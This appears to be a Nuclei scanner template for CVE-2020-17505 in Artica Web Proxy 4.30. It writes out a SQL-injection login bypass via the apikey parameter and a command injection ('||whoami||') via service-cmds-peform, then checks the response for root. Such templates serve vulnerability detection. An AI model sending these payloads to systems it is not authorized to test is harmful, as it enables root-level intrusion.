47 lines
1.5 KiB
YAML
47 lines
1.5 KiB
YAML
id: cve-2020-17505
|
|
|
|
info:
|
|
name: Artica Web Proxy 4.30 OS Command Injection
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
|
|
|
|
# Artica Web Proxy 4.30.00000000
|
|
# allows an authenticated remote attacker
|
|
# to inject commands via the service-cmds parameter in cyrus.php.
|
|
# These commands are executed with root
|
|
# privileges via service_cmds_peform.
|
|
# -
|
|
# References:
|
|
# > https://blog.max0x4141.com/post/artica_proxy/
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: */*
|
|
Connection: close
|
|
|
|
- |
|
|
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: */*
|
|
Connection: close
|
|
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "array(2)"
|
|
- "Position: ||whoami||"
|
|
- "root"
|
|
condition: and
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200
|